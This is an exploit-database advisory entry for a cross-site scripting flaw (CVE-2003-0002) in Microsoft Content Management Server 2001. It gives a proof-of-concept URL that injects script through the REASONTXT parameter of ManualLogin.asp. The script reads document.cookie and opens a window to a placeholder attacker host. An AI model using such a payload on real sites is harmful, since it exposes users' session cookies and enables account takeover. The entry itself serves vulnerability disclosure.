Microsoft Content Management Server 2001 - Cross-Site Scripting
Author: overclocking_a_la_abuela
type: webapps
platform: asp
port:
date_added: 2002-10-09
date_updated: 2012-10-12
verified: 1
codes: CVE-2003-0002;OSVDB-9207
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/5922/info
Microsoft Content Management Server 2001 is reported to be prone to cross-site scripting attacks.
An attacker could construct a malicious link to a vulnerable host that contains arbitrary HTML and script code. If this link is visited by a web user, the attacker-supplied code will be rendered in their browser, in the security context of the vulnerable site.
http://www.example.com/NR/System/Access/ManualLogin.asp?
REASONTXT=<script>alert(document.cookie);window.open
("http://attacker.site.example.com");</SCRIPT>